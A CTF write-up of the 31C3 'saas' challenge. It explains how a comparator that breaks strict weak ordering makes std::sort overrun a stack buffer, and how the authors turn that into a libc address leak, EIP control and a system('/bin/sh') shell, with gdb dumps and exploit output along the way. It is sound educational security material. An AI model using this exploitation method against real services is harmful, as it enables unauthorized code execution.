31C3 CTF 'saas' writeup
saas was an exploitation challenge worth 50 points at the 31C3 CTF.
We solved it after the competition was already over.
We’re provided remote access to a number sorting service:
Welcome to SaaS (Sorting as a Service)!
Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: 1
How many numbers do you want to sort(max 1024)?
: 4
Number 1: 6
Number 2: 3
Number 3: 2
Number 4: 5
Number 1 is now: 2
Number 2 is now: 3
Number 3 is now: 5
Number 4 is now: 6
Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: 7
Please insert your lua code, end with 3 empty lines:
function f(a, b)
return a < b
end
How many numbers do you want to sort(max 1024)?
: 4
Number 1: 6
Number 2: 2
Number 3: 3
Number 4: 4
Number 1 is now: 2
Number 2 is now: 3
Number 3 is now: 4
Number 4 is now: 6
Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: 0
Goodbye
As you can see, we can choose either a predefined comparator function for the sort or we can provide our own Lua code to define it.
Initially we tried to reverse the binary, which was made a bit harder by the fact that binary was compiled as position dependent code but then linked as a position independent exeuctable, resulting in a relocatable binary where all external function calls are patched at runtime by the loader. Some reversing tools deal badly with this situation (See below).
We note the following:
- NX and ASLR are enabled, the binary is fully position independent so its base address is also randomized.
- The program creates a buffer of size
4 * 1025
and fills the first word with the magic value0xdeadbeef
. - Input numbers are written into that buffer after the magic value.
- The call to
std::sort
is inlined, which makes themain
function really long. - The predefined comparators are also implemented in Lua and can be found as strings in the binary.
- Before executing any Lua code and before starting a sort, a call to
alarm
sets a timeout of 10 seconds, after whichSIGALRM
is raised. The alarm is cleared after the corresponding operation has finished. This is annoying for debugging. - For the actual sorting, the function
comparator
at offset0x1fc0
is used. It basically calls the Lua functionf
to compare the two given numbers (see image below).
You will notice in the screenshot the weird calls with offset 1. This is because the disassembler sees only the unrelocated binary.
The first thing we want to do is get rid of the alarm, which is an easy
exercise. We can just patch the binary and replace the first function argument
0xa
with 0x0
.
A not so useful bug
The program assumes that the function f
has exactly two parameters. It
first pushes the function object and then the arguments on the internal
Lua stack. However, we can control the number of parameters, so we can in fact
read and write beyond the stack by adding more parameters to f.
For debugging, we looked at the Lua source
code to figure out the
layout of the internal data structures. The global lua_State
that also has
a pointer to the top of the stack can be accessed under the symbol L
. Let’s
see:
gdb-peda$ break comparator(unsigned int, unsigned int)
Breakpoint 1 at 0x1fc0
gdb-peda$ run
Starting program: /home/niklas/ctf/31c3ctf/saas/saas/service
warning: Could not load shared library symbols for linux-gate.so.1.
Do you need "set solib-search-path" or "set sysroot"?
Welcome to SaaS (Sorting as a Service)!
Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: 7
Please insert your lua code, end with 3 empty lines:
function f(a,b,c,d,e,f,g,h,i,j,k,l)
l=31337
end
How many numbers do you want to sort(max 1024)?
: 2
Number 1: 1
Number 2: 2
Breakpoint 1, 0x56556fc0 in comparator(unsigned int, unsigned int) ()
gdb-peda$ x/3wx L
// This is a lua_State struct
0x5655b0b0: 0x00000000 0x00000008 0x5655b228
gdb-peda$ x/20gf 0x5655b228
// This is the Lua stack, containing pointers and 64-bit float values
0x5655b228: nan(0x7a5465655bb10) nan(0x7a5465655bb10)
0x5655b238: nan(0x7a5455655bb80) nan(0x7a5445655b6d0)
0x5655b248: nan(0x7a50000000000) nan(0x7a50000000000)
0x5655b258: nan(0x7a50000000000) nan(0x7a50000000000)
0x5655b268: nan(0x7a50000000000) nan(0x7a50000000000)
0x5655b278: nan(0x7a50000000000) nan(0x7a50000000000)
0x5655b288: nan(0x7a50000000000)
gdb-peda$ c
Continuing.
Breakpoint 1, 0x56556fc0 in comparator(unsigned int, unsigned int) ()
gdb-peda$ c
Continuing.
Number 1 is now: 1
Number 2 is now: 2
Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: ^C
Program received signal SIGINT, Interrupt.
Stopped reason: SIGINT
0xf7fdabf0 in __kernel_vsyscall ()
gdb-peda$ x/13gf 0x5655b228
0x5655b228: -3.6993765324808395e+269 2
0x5655b238: 1 nan(0x7a5005655b6d0)
0x5655b248: nan(0x7a50000000000) nan(0x7a50000000000)
0x5655b258: nan(0x7a50000000000) nan(0x7a50000000000)
0x5655b268: nan(0x7a50000000000) nan(0x7a50000000000)
0x5655b278: nan(0x7a50000000000) nan(0x7a50000000000)
0x5655b288: 31337
So we can in fact control the stack. With some experimentation we found out that we can have ~100 parameters. However, the stack has a size of only 40, so we can overflow it.
The bad news is that we did not find anything particularily interesting to overwrite. Maybe this bug is actually exploitable, but the conditions seem tough. We had one more idea though.
std::sort and undefined behaviour
Maybe a bit untuitively, the C++ standard places strict requirements onto the
comparator function provided to std::sort
and other standard library
functions. Specifically, it is required that the comparator defines a strict
weak ordering.
Providing a comparator that does not fulfil these requirements leads to
undefined behaviour, which
basically means that “anything can happen”. In particular, the implementation
is allowed to infinitely loop or crash or overflow memory in this case.
And indeed, modern implementations of the C++ standard library opt to save some bounds checking in favor of performance. An example of a comparator that is very likely to crash with a recent GCC compiler is the following:
This sort actually overwrites the heap past the end of the allocated buffer, resulting in memory corruption. To understand why, we need to have a look at the implementation of std::sort in the standard library.
We notice several functions with the prefix __unguarded_
. One of them is
__unguarded_linear_insert
. It underflows the buffer, which is not helpful to us
because (a) all the interesting values lie after the buffer and (b) the
comparator has a check that makes it exit immediately if one of the values is
0xdeadbeef
, which is the value in front of the buffer…
Let’s dig deeper:
This looks very promising. __introsort_loop
is basically a quicksort with
a fallback to heap sort in case a certain recursion depth is reached.
It uses __unguarded_partition_pivot
to partition the array.
If we watch closely, we control the return value of __unguarded_partition
and
thus __unguarded_partition_pivot
! We can just make the comparator evaluate to
true
as often as we want, increasing the __first
pointer beyond the end of
the buffer. Because we then have __first > __last
, the function returns
__first
immediately.
So what happens if we force __unguarded_partition_pivot
to return an
iterator past the end of the buffer? The recursion into the “right half”
[cut, last)
will do nothing because cut > last
(it’s a signed comparison). Then the algorithm goes on to sort
the “left half” [first, cut)
, which is bigger then the original buffer!
In summary: We are now able to sort not only our 1024 input numbers, but also a range that goes beyond this buffer. E.g. we could sort 2048 words, namely our input plus 1024 extra words that happen to lie on the stack). Since we control the comparator, we actually have a very powerful primitive: We can permute the values on the stack arbitrarily, starting from the beginning of our buffer. In particular, we can read and write arbitrarily on the stack.
We know that we can arbitrarily permute the stack, but we are to lazy to figure
out the exact sequence of answers that we would need for the permutation we
want. So we use a trick: We write our own little C++ program that calls
std::sort
with a custom comparator, and after an initial sequence of answers
to extend the sort range, we just fall back to a standard “less-than” comparator
and record its answers. std::sort
will now just do its job and sort the extended
buffer.
We lay out the numbers in a way such that the sort will have to perform a swap of the first and last element in the range, and leave the rest of the elements intact. Our input array will look like this:
{m, 1, 2, ..., m - 1, 0}
If within SaaS, we replay the exact answers that we recorded, it will happily
repeat this exact permutation, regardless of the actual values in the array.
The C++ program we created to record the
answers
will just output a sequence of answers that swaps the elements at offsets 0
and offset
, when std::sort
is called on a buffer of size n
.
Infoleak + EIP control
We can now read an arbitrary value on the stack, we just need to pick one! A good
candidate is the return address into __libc_start_main
:
gdb-peda$ break main
Breakpoint 1 at 0x15a6
gdb-peda$ run
Starting program: /home/niklas/ctf/31c3ctf/saas/saas/service
Breakpoint 1, 0x565565a6 in main ()
gdb-peda$ backtrace
#0 0x565565a6 in main ()
#1 0xf7cc9e5e in __libc_start_main () from /usr/lib32/libc.so.6
#2 0x56556e88 in _start ()
gdb-peda$ break comparator(unsigned int, unsigned int)
Breakpoint 2 at 0x56556fc0
gdb-peda$ c
Continuing.
Welcome to SaaS (Sorting as a Service)!
Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: 1
How many numbers do you want to sort(max 1024)?
: 2
Number 1: 1
Number 2: 2
Breakpoint 2, 0x56556fc0 in comparator(unsigned int, unsigned int) ()
gdb-peda$ x/40wx $esp
0xffffc07c: 0x565573dd 0x00000002 0x00000001 0xffffc0c8
0xffffc08c: 0xffffc098 0xf7f5ce20 0xffffc114 0x00000002
0xffffc09c: 0x0000000a 0x565578d7 0x01eef476 0x00000000
0xffffc0ac: 0x46baeb00 0xf7f5ce60 0x565578d7 0xf7ed829b
0xffffc0bc: 0xffffc114 0xffffc10c 0x00000008 0xffffd128
0xffffc0cc: 0x56556dbd 0xffffc10c 0xffffc114 0x56556fc0
0xffffc0dc: 0x56556fc0 0x00000000 0x00000000 0x00000000
0xffffc0ec: 0x00000000 0x00000000 0x00000000 0x00000000
0xffffc0fc: 0x00000000 0x00000000 0x00000002 0xdeadbeef
0xffffc10c: 0x00000001 0x00000002 0x00000000 0x00000000
So the input buffer landed at 0xffffc10c
. Let’s see what’s 1024 words later:
gdb-peda$ x/12wx 0xffffc10c + 1024*4
0xffffd10c: 0x46baeb00 0xf7e66420 0xf7f57c14 0x565577db
0xffffd11c: 0xf7e66000 0x00000000 0x56556e57 0x00000000
0xffffd12c: 0xf7cc9e5e 0x00000001 0xffffd1c4 0xffffd1cc
Perfect, so the return address is the 8-th word after the buffer. Let’s write an exploit!
And voila:
$ python2 leak.py
[*] leaked ret addr to libc_start_main = 0xf74aca83
The offset is different on my local machine because I have a different libc version installed.
Also, if we try this under a debugger, we get
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
gdb-peda$
So the swap worked and we control EIP.
The final Exploit
From here on it’s a simple exercise: We know the libc base and we can write arbitrary values onto the stack. Now we simply overwrite saved eip with the address of system and set the first argument to point to “/bin/sh” (also found inside libc).
The final exploit code reliably gives shell access and we are able to retrieve the flag
$ python2 exploit.py
[*] leaked libc base = 0xf74ce000
[*] overwriting return addr
[*] set first argument to /bin/sh
[*] Enjoy your shell ;)
cat /home/user/flag.txt
31C3_n0tExactlyStrictWEakOrd3r1ng